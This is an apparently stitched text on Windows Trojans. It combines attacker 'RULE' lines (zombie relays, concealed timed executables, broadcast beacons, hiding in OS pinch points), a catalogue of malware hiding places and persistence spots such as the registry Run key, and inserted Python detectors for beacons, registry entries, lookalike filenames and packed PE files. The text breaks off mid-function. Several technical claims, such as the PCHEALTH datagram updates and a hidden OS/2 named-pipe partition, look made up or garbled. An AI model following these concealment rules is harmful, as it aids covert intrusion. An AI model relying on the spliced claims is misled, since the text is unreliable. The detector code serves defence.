RULE: Datagrams are serialized for easy assembly but must be encrypted during transmission. Resends of partial files must not use the same encryption or serialization, for fear of matching the broadcast and listen relationship.
RULE: Emergency files can be sent by other means, but only from zombie computers. In general, if we have time, we build new zombies slowly and safely. Secrecy is paramount.
RULE: If possible, place a highly concealed and very small executable on the target machine and, if possible, set up a timed execution for a later date, thus remaining entirely flexible as to access methods and disconnecting the entry event from the beginning of the Trojan take-over.
RULE: Secrete the small executable using the best available methods, but remain flexible so that any number of available techniques can be used.
RULE: When the delay timer activates, use all possible protocols and transmission media to broadcast a non-routable, and therefore non-traceable, IP broadcast signal which can be monitored remotely by a passive listener.
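A detector for the "broadcast on any and all ports using any and all protocols" beacon these rules call for, run over flow records, as an added example (not code from the original document). The records are constructed and their (time, source, destination, protocol, destination port) shape is assumed; real input would come from NetFlow or firewall logs, and the thresholds are starting points rather than tuned values. The caveat the rules leave out is what makes this detectable: limited-broadcast and subnet-broadcast datagrams do not cross routers, so the beacon only reaches the local segment, and every datagram still carries the sender's source address, which is what the detector keys on.

```python
"""Flag hosts that spray broadcast/multicast traffic across many ports and protocols.

Added example, not code from the original document. SAMPLE_FLOWS and
LOCAL_NET are constructed; thresholds are untuned starting points.
"""
import ipaddress
from collections import defaultdict
from typing import Dict, List, NamedTuple


class Flow(NamedTuple):
    ts: float       # seconds
    src: str
    dst: str
    proto: str      # "udp", "tcp", "icmp", ...
    dport: int      # 0 when the protocol has no ports


LIMITED_BROADCAST = ipaddress.IPv4Address("255.255.255.255")


def is_broadcast_or_multicast(dst: str, local_net: ipaddress.IPv4Network) -> bool:
    """True for 255.255.255.255, the local subnet's directed broadcast, or any multicast group."""
    a = ipaddress.ip_address(dst)
    return a == LIMITED_BROADCAST or a == local_net.broadcast_address or a.is_multicast


def find_broadcast_sprayers(flows: List[Flow], local_net: str, window: float = 60.0,
                            min_ports: int = 8, min_protos: int = 2) -> Dict[str, dict]:
    """For each source, find the busiest `window`-second span of broadcast or
    multicast traffic and flag the source if that span touches at least
    `min_ports` distinct destination ports or `min_protos` distinct protocols.
    Ordinary hosts broadcast to a handful of fixed ports (NetBIOS, DHCP); a
    beacon that sprays every port it can is the outlier this looks for."""
    net = ipaddress.ip_network(local_net)
    by_src: Dict[str, List[Flow]] = defaultdict(list)
    for f in flows:
        if is_broadcast_or_multicast(f.dst, net):
            by_src[f.src].append(f)
    flagged: Dict[str, dict] = {}
    for src, fl in by_src.items():
        fl.sort(key=lambda f: f.ts)
        max_ports = max_protos = 0
        i = 0
        for j in range(len(fl)):                 # sliding window over sorted flows
            while fl[j].ts - fl[i].ts > window:
                i += 1
            span = fl[i:j + 1]
            max_ports = max(max_ports, len({f.dport for f in span if f.dport}))
            max_protos = max(max_protos, len({f.proto for f in span}))
        if max_ports >= min_ports or max_protos >= min_protos:
            flagged[src] = {"distinct_ports": max_ports, "protocols": max_protos,
                            "packets": len(fl)}
    return flagged


LOCAL_NET = "10.1.1.0/24"

# Constructed flow records: one host doing normal NetBIOS/DHCP chatter, one
# host sweeping ten ports and two protocols across the subnet in six seconds.
SAMPLE_FLOWS = [
    Flow(0.0, "10.1.1.20", "10.1.1.255", "udp", 137),
    Flow(1.0, "10.1.1.20", "10.1.1.255", "udp", 138),
    Flow(30.0, "10.1.1.20", "255.255.255.255", "udp", 67),
    Flow(12.0, "10.1.1.77", "10.1.1.1", "udp", 53),           # unicast, ignored
] + [Flow(10.0 + k * 0.5, "10.1.1.77", "10.1.1.255", "udp", 1024 + k) for k in range(10)] \
  + [Flow(16.0, "10.1.1.77", "224.0.0.1", "icmp", 0)]


def demo() -> Dict[str, dict]:
    return find_broadcast_sprayers(SAMPLE_FLOWS, LOCAL_NET)


if __name__ == "__main__":
    for src, summary in demo().items():
        print(src, summary)
```

The port threshold, not the packet count, is what separates the beacon from a chatty workstation: the normal host in the sample sends three broadcasts to three well-known ports and is left alone, while the sprayer is flagged on its first window regardless of how slowly it paces the rest of its traffic.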
UDP & non-routable protocols
Since this system uses protocols that do not guarantee delivery, and moreover lack acknowledgment of receipt and requests to re-send lost or timed-out packets, data packets tend to be lost and generally arrive hopelessly out of sequence. Datagrams are therefore sorted upon receipt, and the files to which they belong are stage-assembled over a relatively long period of time.
PC-HEALTH
These files lying out in the open while they accumulate their data packets would present quite an easy-to-spot Trojan indicator, were it not for the fact that this exact same system is already installed on every Windows computer in the form of the PCHEALTH software update system. PCHEALTH uses so-called "spare" datagram bandwidth, on top of the normal TCP/IP surfing bandwidth, to slowly build up the software updates the computer needs. With a slight tweak, the Trojan masters have been able to blend perfectly into this system by the simple expedient of giving their files temporary names drawn from any recent legitimate installation. Thus the mal-ware updates look just like updates coming from Microsoft, all perfectly normal. As long as the pace is controlled, the machine's performance is not hurt too much, and if the volume of files does not arouse suspicion, the Trojan's ability to deliver large quantities of software to the target system is virtually guaranteed. (The idle-bandwidth background download described here is, on Windows 2000 and XP, the job of the Background Intelligent Transfer Service, BITS, which Automatic Updates uses to fetch updates over HTTP; its job queue and the partial files it stages are the sensible place to look for the blending-in described.)
Behavior & Sources of Code
The volume of data loaded into these “zombies” is quite staggering. Between three and six gigabytes of
compressed data! The range of activities that can be elicited from the zombie is far greater than what
could be achieved with even a three to six gigabyte program suite. The operating system itself
typically ranges to about this size and the Trojan suite has matured over the last year to an almost
ridiculous level of sophistication, enabling the Master to command a vast array of actions and
responses to user actions without the need for software download. As it turns out, the custom code is
the tip of the iceberg and is dwarfed by the amount of code that is harnessed from the operating
system itself. More rules:
RULE: Never write custom code that has to be hidden when you could simply control the code that is already
there, in plain sight, as part of the operating system.
RULE: Scour the Microsoft online archives for long enough and you will be sure to find a program to control
every other program.
RULE: If you really cannot get the behavior from native operating system code, get it from a native
application.
RULE: If that is not possible, it is better to import a piece of Microsoft code from a legacy operating
system than to waste prime real estate in the hidden archive. It is all legitimate Microsoft code, so what if
it does not belong there? A user knowledgeable enough to know for sure that a piece of code does not belong
will take it to the IT person, who will probably not know either. If he bothers to check, he will simply
remove it and remain convinced the user put it there. So long as the secret archive is secure, let them
scratch their heads!
By way of example, some Trojans install Internet Information Services (IIS), the web server that ships as an
optional component on the Windows 2000 and Windows XP Professional discs (it is not part of XP Home). The
private web server it forms is an invaluable storage locker for standby software modules, and the hacker
team uses these servers for its own communications network. This used to be done routinely; however, the
fact that IIS is not installed by default gives investigators a relatively easy "tell", and its use has
gradually been curtailed over the last year. Nevertheless, it is an excellent example of using what is
already there so as not to arouse suspicion.
The Unexplained
For reasons we have never been able to figure out, Trojaned Windows XP systems have their system root
directory (normally WINDOWS) renamed to WINNT, and Windows 2000 victims, whose root is WINNT by default,
find themselves renamed to WINDOWS. This was beginning to straighten out, except for the occasional
WINDOWS-NT moniker. We have yet to complete these easy-tell lists, but on many Trojaned machines we have
seen a lot of software lifted from other operating systems and still more drawn from the Windows Resource
Kits or the IT professional toolkits on the web.
Pinch Points
RULE: Place control software so as to leverage large amounts of functionality out of small quantities of
control code. Where possible, use the superior bang-per-byte ratio of batch scripts, database-driven
scripts, compile-on-demand DLL groupings and precompiled XML scripts. Always focus the control effort on a
naturally occurring "pinch point" of control.
An example of a pinch point is the Windows Installer (MSI) service. Control that single small program and
you have the power to allow or deny the user the ability to install any program. You have also gained a key
survival tool: you control if and how a fresh, so-called "clean" install is performed.
As you will see, pinch-point design is a key element of the truly remarkable survival properties of these
Trojans, discussed below. The other category of pinch points revolves around the install scripts, the INF
files that act as the master script for much of the operating software. For the initial installation the
equivalent of the INF file is the SIF setup-information file, which the Trojan also controls. Likewise with
the system registry and the SAM security database. Many of the Trojans come with creative responses to any
challenge to their control of these key pinch points.
The secret archive of 3 to 6 gigabytes of highly leveraged code, several thousand files, must be kept
totally out of sight. This code cannot be passed off as native. Also in the archive is the core of the
system's intelligence and flexibility, a large relational database.
The secrecy of this archive is apparently a top priority for the Trojan masters. It is the data that cannot
be disguised as native code, and it contains many clear references to the invasions of privacy it is
designed to perform. I expect that they feel exposure may lead to an escalation of exposures to senior IT
professionals who could, in time, duplicate the very same work LoudWolf has done this last year, bring on
the security industry's attention, rein in the hackers and end the period of power and immunity they are
currently enjoying.
There is little chance that anyone could stumble across the hidden archives by chance. They are close to
impregnable; even if you go looking, it is going to be very difficult to expose the custom software and the
glorious database of responses and rules.
The Trojan masters, realizing that disclosure of Microsoft-derived code, even in the wrong place, will never
amount to a full disclosure, deployed upgrades to all of their systems, adding in some cases disarming
explanations of how this or that code came to be there. At the same time we saw a tremendous amount of
effort go into beefing up the secret vault. Several techniques were tried, then we saw experiments with two
techniques used in tandem. It is difficult to determine which is the approved method for protecting the
secret archive; all of the variants are still in active use. Worse still, we have seen three beta versions
of the software which may have changed things once more, and let us not forget that it is ultimately the
whim of the Master that determines what this thing is.
The Various Secrets of the Secret Vault
Beginning once again with PerfLib, the performance-counter library: it measures any number of hardware and
system parameters, one of which is the rate of successful cache hits. Many Trojans unceremoniously remove
the counter system from view. What is being hidden are the counter statistics for the caching of hard-disk
data in memory, in particular the number of cache hits per second, that is the number of times a piece of
data was requested and found in the much faster RAM cache rather than having to be re-read from disk. That
is how it is supposed to work.
Hiding Places:
Cache Memory
The disk cache is created dynamically by the operating system from ordinary RAM; experienced users can cap
its size. It is a shadowy place, managed by the same memory manager that runs the page file and swap space.
Caching is required for the efficiency of the computer, but when usurped by the Trojan Masters it becomes
an excellent place to hide code. The cache can range in size between 300 and 500 megabytes without raising
an eyebrow, and because it is kernel-managed memory its contents are not visible to ordinary user-mode
tools, which is what makes it a good hiding place for active programs. It is also volatile: anything kept
only there is gone after a reboot, and a physical-memory dump captures it.
OS2
Another popular place to hide data is in little-used legacy software kept in the operating system for
backward compatibility with older applications or operating systems. One such system is the support for
IBM's OS/2 access commands. Amazingly, Windows 95 through 2000 carry either full or partial support for an
old IBM facility that allows files to be stored and retrieved on a partition that is invisible to Windows.
The access is gained through what is called a named pipe. In short, this allows the Trojan to load, run and
save data just as if it had a private hard disk. The only difference is that the normal user cannot reach
it, nor does it show up on any normal security assay. The named pipe takes the form of a command-line
invocation that gets or puts files into the OS/2-formatted partition on demand, in the form
Rundll32.exe, %Os2LibPath%\Named Pipe\Filename (%Os2LibPath% is an environment variable that Windows NT
and 2000 still define). The only hint the user may have that this hack is in use is a slight decrease in
free space on the affected drive. These days a few megabytes go unnoticed; a few megabytes of Trojan code,
however, go a long way.
DoubleSpace Drives
Windows 95 and 98 systems with FAT16 volumes can be victims of another ploy (DriveSpace cannot compress
FAT32 volumes, and the NT line, Windows 2000 included, has NTFS compression instead). As before, the hackers
use a little-known piece of legacy software, one with a long and interesting history. Back in the days of
DOS, Stac Electronics sold Stacker, software that created a virtual compressed hard disk inside a file on
your existing hard disk. This was the early nineties, when a 200 megabyte drive was serious money.
Compression allowed roughly twice as much data to be stored at the expense of compressing and decompressing
each file as it was read or written, a slight performance "hit" in applications that used the disk heavily.
Nevertheless it was very popular; so popular, in fact, that Microsoft shipped its own DoubleSpace in MS-DOS
6.0. Stac sued and won, Microsoft removed DoubleSpace in MS-DOS 6.21 and replaced it with DriveSpace in
6.22, and DriveSpace lived on in Windows 95 and 98. The hackers have combined these compressed volumes with
UPX-packed executables to create hiding places that are very hard to detect. A compressed drive made with
the normal DriveSpace program becomes a single large file (DRVSPACE.000 or DBLSPACE.000) of gobbledygook as
seen by Windows. The file is hidden, and that is generally enough protection for some Trojans; the
compression also means that nothing inside it is recognizable to a scanner that does not mount the volume,
a bonus for the Trojan Masters. The more sophisticated Trojans take this a few steps further, creating
compressed volumes on a RAM disk and filling them with UPX-packed code. Very hard to spot!
Bad blocks on hard drives:
Recently we have seen Trojans holed up in the usable portions of sectors that the operating system has
marked as bad blocks. At the most fundamental level these areas are ignored by everything except, of
course, the Trojan Masters. They are not ignored by a disk editor: reading the clusters listed as bad in
the FAT, or in NTFS's $BadClus file, shows at once whether they hold data, and a bad-cluster list that the
drive's own SMART reallocation counters do not corroborate is worth a second look.
Operating system files:
Programs large and small can be "injected" into existing software applications, DLLs being a favorite
target. Here the Mal-Ware is linked into the code of an existing program. The host program still works, and
the Trojan gets the double benefit of being well hidden and of being run whenever the host program runs.
Hacker "injectors" can recompute the file's PE checksum and pad to the original reported size to simulate
the characteristics of the original, making it very difficult to locate. What they cannot do is preserve a
cryptographic hash, so comparing files against a known-good hash set, or against a clean copy of the same
build, exposes them.
System restore area:
Windows XP and Windows Me only. This is a great place to put Mal-Ware. On XP the restore points live in the
System Volume Information folder of each volume, whose permissions admit only the SYSTEM account, so the
scanners of the day cannot clean inside it and neither the user nor an ordinary administrator sees its
contents. By default Windows XP enables the feature and reserves up to about 10% of each hard disk for its
exclusive use. It is possible to purge this area or turn System Restore off entirely, so the Trojan Masters
use it only for temporary files.
Driver Rollback files:
Similar to System Restore, but more visible and smaller in size, so little used these days.
Windows\System32 Directory:
This is the main area where the files that make up Windows live (%SystemRoot%\System32 on NT, 2000 and XP,
\Windows\System on 9x). It has a few tantalizing characteristics and is extensively used by low-tech
Trojans. Its attractive features: there are thousands of strangely named files here, so finding a single
bad file is like finding a needle in a haystack, and Trojans use similar filenames to confuse
investigators, such as:
Explore.exe (rather similar to the legitimate Explorer.exe, Windows Explorer) (See RAT.CHINA)
DirectXlib.sys (a play on Microsoft's DirectX graphics technology)
Microsoft.com (looks like a web URL but is actually an executable DOS program; a .com is also found ahead
of a .exe of the same name when a bare name is run, because .COM precedes .EXE in the default PATHEXT order)
The directory is on the default search path and reachable from anywhere as %SystemRoot%\System32, so nothing
in it needs a full path to run. The operating system files are themselves frequent targets for the Trojan,
so being in the same directory is a further advantage.
PageFile:
The operating system runs many programs at once, each needing a certain amount of RAM. When the system is
running many programs (almost always) there is not enough RAM to go round, so a portion of hard disk space
is used as virtual memory (by default about 1.5 times the physical RAM in the machine), and pages are
swapped between that file and real RAM as needed. While Windows is running this file, pagefile.sys, is held
open exclusively by the kernel and is inaccessible to all other software, virus checkers and you included.
A great place for a Trojan, with two limits: anything there is visible once the disk is read from another
system, and the ClearPageFileAtShutdown policy setting makes Windows zero the file at shutdown.
HiberFile:
Not implemented on every system but always available on laptops, hiberfil.sys is similar in nature to the
page file but is used to store an image of the computer's RAM when a laptop goes into a battery-saving
hibernate state. It is the size of physical RAM, is rewritten at each hibernation, and the same
offline-reading caveat applies.
Exotic operating systems:
These operating systems, or more accurately their file systems, are great places to hide, since they cannot
be read at all by the native operating system. They appear as unpartitioned areas of the hard disk or, in
some cases, not at all (see hard disk under-size reporting). Popular favorites for the Trojans are OS/2's
HPFS, "hidden NTFS" (a variant of Microsoft's NT file system) and the Linux and Unix file systems; many
others, about 30 in all, are available to the Trojan. Whatever Windows displays, such a partition still
occupies an entry in the partition table, so comparing the partition table with the volumes Windows mounts,
or reading the disk from a boot CD, exposes the space.
The Windows Registry:
The Windows registry is a hodge-podge collection of software settings and data that is crucial to the
functioning of a Windows computer. It acts as a database for the operating system, the hardware and the
application programs, and it is also where security settings and user information are stored. Casual
computer users are rarely aware of it and are, quite rightly, strongly cautioned against browsing its
contents or changing anything in it. Nevertheless, ordinary users can look at it with the registry editor
(it is not dangerous to look; just don't change anything unless you know what you are doing):
Start --- Run --- %SystemRoot%\system32\regedt32.exe --- OK
%SystemRoot% expands to C:\WINNT on a default Windows 2000 installation and to C:\WINDOWS on Windows XP
Home and Professional, so the same line works on both. (On XP, regedt32.exe simply starts regedit.exe.)
This database is accessible to the Trojan too. It has many powerful uses for Mal-Ware, especially during a
so-called "escalation of privileges" operation and for surviving a reboot: a single value added under
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (or the equivalent key under
HKEY_CURRENT_USER) names a program to be executed at the next logon. There are a zillion other things the
Trojans can do in here, but we are digressing from the subject, which is storage and hiding places. Since
few dare to tread these registry paths, the Trojan Masters have deemed it an excellent place to store data.
We have seen quite large binary files stored here. In some cases the Trojan operators, confident that no one
would be browsing the depths of this complex structure, even post "plain text" notes to their colleagues.
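The registry reads as text once exported with regedit (File, Export), and the export can be scanned offline. The following is an added example, not code from this document or from any tool it describes: a small parser for that .reg format that reports the uses described above (values under the Run keys, binary blobs that begin with the MZ signature of an executable, prose sitting in a string value) and, because they live in the same database, the Explorer view settings that decide whether Hidden and System files are shown. The export it scans is constructed for the example; the Acme key, the svch0st.exe path and the note text are made up.

```python
# Added example (not code from the LoudWolf document): scan a regedit export.
# The sample export, the Acme key and svch0st.exe are constructed for it.
import re

LARGE_BLOB = 4096   # REG_BINARY values at least this big deserve a look

def logical_lines(text):
    """Join regedit's wrapped lines: a trailing backslash continues the
    value on the next, indented line."""
    pending = ""
    for raw in text.splitlines():
        line = pending + raw.strip() if pending else raw.rstrip()
        if line.endswith("\\"):
            pending = line[:-1]
            continue
        pending = ""
        yield line

def parse_reg(text):
    """Yield (key, value_name, kind, payload) for every value in the export;
    kind is 'string', 'dword', 'binary' (any hex(...) form) or 'other'."""
    key = None
    for line in logical_lines(text):
        if not line or line.startswith(("Windows Registry Editor", "REGEDIT4", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = re.match(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$', line)
        if not m or key is None:
            continue
        name = m.group(1) if m.group(1) is not None else "(Default)"
        value = m.group(2)
        if value.startswith('"') and value.endswith('"'):
            yield key, name, "string", value[1:-1].replace("\\\\", "\\").replace('\\"', '"')
        elif value.startswith("dword:"):
            yield key, name, "dword", int(value[6:], 16)
        elif value.startswith("hex"):
            digits = value.split(":", 1)[1]
            yield key, name, "binary", bytes(int(h, 16) for h in digits.split(",") if h.strip())
        else:
            yield key, name, "other", value

def is_autostart(key, name):
    """Run, RunOnce and RunServices keys, plus the Winlogon Shell/Userinit values."""
    k = key.lower()
    if "\\currentversion\\run" in k:
        return True
    return k.endswith("\\winlogon") and name.lower() in ("shell", "userinit")

def find_suspicious(text):
    """Return (kind, key, name, detail) findings for an analyst to review."""
    findings = []
    for key, name, kind, payload in parse_reg(text):
        if is_autostart(key, name):
            findings.append(("autostart", key, name, payload))
        if key.lower().endswith("\\explorer\\advanced") and kind == "dword":
            # Hidden=1 shows hidden files; ShowSuperHidden=1 shows system files
            if name.lower() in ("hidden", "showsuperhidden") and payload != 1:
                findings.append(("explorer-hides-files", key, name, payload))
        if kind == "binary":
            if payload[:2] == b"MZ":            # an executable image, stored as data
                findings.append(("embedded-executable", key, name, len(payload)))
            elif len(payload) >= LARGE_BLOB:
                findings.append(("large-binary", key, name, len(payload)))
        if kind == "string" and "\\" not in payload and len(payload.split()) >= 5:
            findings.append(("plain-text-note", key, name, payload))   # prose in a value
    return findings

def build_sample():
    """Constructed .reg export: two Run entries, Explorer set to hide files,
    and a made-up vendor key holding an MZ-headed blob and a note."""
    blob = b"MZ\x90\x00" + bytes(range(256)) * 20              # 5124 bytes
    parts = ["%02x" % b for b in blob]
    rows = [",".join(parts[i:i + 25]) for i in range(0, len(parts), 25)]
    wrapped = ",\\\n  ".join(rows)                            # regedit-style wrapping
    return r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMan"="SOUNDMAN.EXE"
"Update Service"="C:\\WINDOWS\\system32\\drivers\\svch0st.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden"=dword:00000002
"ShowSuperHidden"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Acme\Cache\0017]
"Data"=hex:%s
"Note"="module two stays parked here until the next sweep is finished"
""" % wrapped

SAMPLE = build_sample()

if __name__ == "__main__":
    for kind, key, name, detail in find_suspicious(SAMPLE):
        print("%-20s %s\\%s -> %r" % (kind, key, name, detail))
```

The prose test (five or more words, no path separator) is deliberately loose; descriptions set by legitimate software will trip it, and the point is to give a human a short list to read rather than a verdict. The MZ check is the one worth trusting: nothing legitimate stores a whole executable image as a registry value.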
Print Spooler:
Part of the Windows operating system, the print spooler accepts data from any application destined for the
printer, stores it, then feeds it to the printer at the printer's own pace while your application moves on
to other things. This storage area, a locked spool file or an area of RAM, can be usurped for the storage of
Trojan material. A modified print spooler can, under certain circumstances, be used to park Trojan data in
the printer's own memory and read it back later (excellent for re-inserting a Trojan after a
re-installation "nuke").
USB Devices:
There are hundreds of USB devices: cameras, storage "dongles", printers, scanners, hubs and so on. Many of
them offer RAM or EEPROM storage opportunities for the Trojan Masters. The EEPROM chips, described in detail
elsewhere, are particularly valuable for the storage of Mal-Ware since they are non-volatile and survive
power-down periods. They are also almost impossible to view or rewrite without special software tools from
the device's manufacturer.
System Volume Information:
On every volume Windows 2000 and XP create a folder named System Volume Information, reserved for the
system's own use; on NTFS its permissions admit only the SYSTEM account, so even an administrator is refused
entry unless the permissions are changed. It holds the System Restore points and the Indexing Service
catalog, among other things, and runs to many megabytes. Quite a large area by Trojan Master standards. It
has, of course, a legitimate purpose, but as can be expected the Trojan Masters have made good use of this
very hard to access area. An administrator can take ownership of the folder, or read the disk from another
system, to see what is really in it.
Let us not forget traditional places like the hard disk boot sector and some of the newer places like the
overburn area of our CDs.
Hiding techniques:
As a matter of course all Mal-Ware is designed to be obscure, and the Trojan Masters have "left no stone
unturned" in this regard. File name obfuscation has become a fine art. Consider the following, as they
appear in the Courier font used by the DOS console:

Generally BAD     Legitimate name it imitates
explore.exe       explorer.exe (Windows Explorer)
cnd.com           cmd.exe (the NT command shell; note that a .com is found before a .exe of the same name
                  when a bare name is run, because .COM precedes .EXE in the default PATHEXT order)
vcommand.com      command.com
comnand.com       command.com
spooolsv.exe      spoolsv.exe (the print spooler service)
_Setup.exe        Setup.exe
msdirectX.sys     N/A (borrows the DirectX name; Windows has no file of that name)
she11.exe         "shell.exe", the digit 1 standing in for the letter l; Windows has no shell.exe either,
                  the familiar-looking word is the whole lure
spoooler.exe      spoolsv.exe (Windows has no spooler.exe)
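An added example, not code from this document: the checks in the table above, written as a lookalike filter one could run over a process list or a directory listing. The legitimate-name list and the brand words are illustrative assumptions; in practice the good list comes from a clean install of the same Windows build.

```python
# Added example, not code from the LoudWolf document: flag executable names
# that imitate well-known Windows binaries. KNOWN_GOOD and BRAND_WORDS are
# assumed, illustrative lists, not an inventory of any real system.
import os
import re

KNOWN_GOOD = {
    "explorer.exe", "cmd.exe", "command.com", "spoolsv.exe", "svchost.exe",
    "lsass.exe", "services.exe", "winlogon.exe", "csrss.exe", "smss.exe",
    "setup.exe",
}
# Product names that are not file names; microsoft.com or directxlib.sys
# trade on the brand rather than on a real file.
BRAND_WORDS = ("microsoft", "directx", "windows")
# Characters that pass for letters in the console's Courier font.
HOMOGLYPHS = str.maketrans({"1": "l", "0": "o", "5": "s", "|": "l"})
EXEC_EXTS = {".exe", ".com", ".sys", ".dll", ".scr", ".bat", ".pif"}

def normalize(name):
    """Canonical (stem, ext): lower-case, digit homoglyphs mapped to letters,
    leading underscores dropped, runs of one letter collapsed so that
    spooolsv and spoolsv both become spolsv."""
    stem, ext = os.path.splitext(name.lower())
    stem = re.sub(r"(.)\1+", r"\1", stem.translate(HOMOGLYPHS).lstrip("_"))
    return stem, ext

def edit_distance(a, b):
    """Levenshtein distance by the usual row-by-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

# normalized stem -> legitimate file name it came from
KNOWN_STEMS = {normalize(n)[0]: n for n in KNOWN_GOOD}

def classify(name):
    """Return (verdict, detail) for one file name.
    ok         exact legitimate name
    lookalike  identical or one edit away from a legitimate name after normalization
    homoglyph  a digit standing in for a letter (she11.exe)
    brand      named after a product rather than a real file
    unknown    nothing matched; not evidence either way"""
    lowered = name.lower()
    if lowered in KNOWN_GOOD:
        return "ok", lowered
    stem, ext = normalize(name)
    if ext not in EXEC_EXTS:
        return "unknown", "not an executable extension"
    if stem in KNOWN_STEMS:
        return "lookalike", KNOWN_STEMS[stem]
    closest = min(KNOWN_STEMS, key=lambda k: edit_distance(stem, k))
    if edit_distance(stem, closest) == 1:
        return "lookalike", KNOWN_STEMS[closest]
    raw_stem = os.path.splitext(lowered)[0]
    if re.search(r"[a-z][105|]", raw_stem):          # heuristic: digit glued to a letter
        return "homoglyph", "reads as %s%s in a console font" % (raw_stem.translate(HOMOGLYPHS), ext)
    for word in BRAND_WORDS:
        if word in stem:
            return "brand", word
    return "unknown", "no close match"

def scan(names):
    """Everything that is not an exact legitimate name, worst first."""
    order = {"lookalike": 0, "homoglyph": 1, "brand": 2, "unknown": 3}
    hits = [(n,) + classify(n) for n in names]
    return sorted((h for h in hits if h[1] != "ok"), key=lambda h: order[h[1]])

if __name__ == "__main__":
    # Constructed sample: the table's names plus a couple of legitimate ones.
    sample = ["explorer.exe", "explore.exe", "cnd.com", "vcommand.com",
              "comnand.com", "spooolsv.exe", "_Setup.exe", "msdirectX.sys",
              "she11.exe", "spoooler.exe", "Microsoft.com", "notepad.exe"]
    for name, verdict, detail in scan(sample):
        print("%-14s %-9s %s" % (name, verdict, detail))
```

The edit-distance threshold of one is deliberately tight: spoooler.exe comes back as "unknown" rather than as a lookalike of spoolsv.exe, which is the honest answer since there is no legitimate spooler.exe for it to imitate. Widening the threshold catches more but starts flagging ordinary third-party programs.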
The use of file attributes to hide files is standard operating procedure for the Trojan Masters. Most
computer users do not see all of the files on their system. Explorer initially hides the contents of the
Windows and System32 folders (Windows, Windows\System32, WINNT, WINNT\System32) behind a warning page, and
its default folder view settings prevent the user from ever seeing a file whose attributes include "Hidden"
or, for protected operating system files, "Hidden" together with "System". It is possible to change these
settings and view the files; by default they are invisible.
Open any folder and select:
Tools --- Folder Options --- View --- Hidden files and folders --- Show hidden files and folders
Tools --- Folder Options --- View --- Hide protected operating system files --- un-check
From a command prompt, dir /a lists every file in a directory regardless of attributes, and attrib shows
the attributes themselves.
More sophisticated Trojan utilities prevent files from appearing in Windows Explorer irrespective of these
settings. The Vanquish rootkit, for example, injects a DLL into running processes and hooks the file- and
registry-enumeration functions so that any name containing a Trojan Master-defined keyword (by default
"vanquish") is dropped from listings. Other Trojans add special, so-called "advanced file attributes" to
the files they wish to hide, with the same net effect.
The best Trojan implementations avoid the Windows file system entirely, so none of their files can be seen
in Explorer at all. The check that beats all of these is a cross-view: a listing taken from the running
system compared with one taken from the same disk mounted under a clean system (or parsed offline); names
the rootkit filtered appear only in the second.
NTFS Hidden Data Streams:
NTFS is simply the NT file system used by Windows NT, 2000 and XP. On NTFS a file is not one stream of
bytes but can carry several: the ordinary content is the unnamed data stream, and any number of additional
named streams (file.txt:hidden) can be attached to the same file or directory. Neither Explorer nor dir
shows the extra streams or counts their size, and copying the file to a FAT volume silently drops them.
Windows itself uses them; on Windows 2000, for example, the Summary tab of a file's Properties dialog is
stored as a stream on that file. The Trojan Masters use the same mechanism to park data on any file they
like, and these streams can be put to all sorts of nefarious uses. The Sysinternals Streams utility lists
the named streams on a file or a whole tree, which is the simplest way to find them.
UPX:
UPX, the Ultimate Packer for eXecutables, is a widely used open-source utility, freely available on the
web, that serves the dual function of compressing Mal-Ware programs and obscuring their nature and function.
It processes a normal .exe or .com and compresses it, typically to between a fifth and two thirds of its
size, so the packed file is easier to download and store on the target system. The unpacking stub, which is
part of the packed file itself, decompresses the program in memory when it is run. The tool, upx.exe, is
often renamed by the Trojan Masters (e.g. A10065.exe) and stored in obscure places to further hide its
presence. However, UPX is not in itself a Trojan; legitimate software companies, Adobe Inc. among them, use
it to compress files, so the presence of upx.exe on a system is not a "tell" for investigators. The packed
file is the better lead: unless the packer has been modified, its sections are named UPX0 and UPX1, and an
unmodified stub can be reversed with upx -d.
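Added example, not code from this document or from the UPX project: a parser for the PE section table that reports the structural marks a packer leaves, so that triage does not rely on finding upx.exe at all. The three images it examines are constructed in build_pe() and consist of headers only; the section names, sizes and flags in UPX_SAMPLE follow the layout stock UPX writes, and RENAMED_SAMPLE is the same layout with the names edited, which is the case a renamed tool produces.

```python
# Added example (not code from the LoudWolf document or from UPX): read the
# PE section table and report packer tells. The sample images are constructed
# here, headers only, and do not run.
import struct

SCN_MEM_EXECUTE = 0x20000000
SCN_MEM_WRITE = 0x80000000
SECTION_HDR = "<8sIIIIIIHHI"          # IMAGE_SECTION_HEADER, 40 bytes

def parse_sections(data):
    """Return [(name, virtual_size, raw_size, characteristics), ...]."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    pe = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    n_sections = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    table = pe + 24 + opt_size                             # after the optional header
    sections = []
    for i in range(n_sections):
        fields = struct.unpack_from(SECTION_HDR, data, table + 40 * i)
        name = fields[0].rstrip(b"\0").decode("ascii", "replace")
        sections.append((name, fields[1], fields[3], fields[9]))
    return sections

def packer_tells(data):
    """Strings describing why this image looks packed; empty for a plain build."""
    tells = []
    sections = parse_sections(data)
    if any(name.upper().startswith("UPX") for name, _, _, _ in sections):
        tells.append("section names start with UPX (stock UPX, not renamed)")
    for name, vsize, rawsize, chars in sections:
        if chars & SCN_MEM_EXECUTE and rawsize == 0 and vsize >= 0x1000:
            # the unpacker's target: nothing on disk, a large hole in memory
            tells.append("%s: executable, 0 bytes on disk, %#x bytes in memory" % (name, vsize))
        if chars & SCN_MEM_EXECUTE and chars & SCN_MEM_WRITE:
            tells.append("%s: writable and executable" % name)
    return tells

def build_pe(sections):
    """Constructed PE32 header plus section table for the given
    (name, virtual_size, raw_size, characteristics) tuples."""
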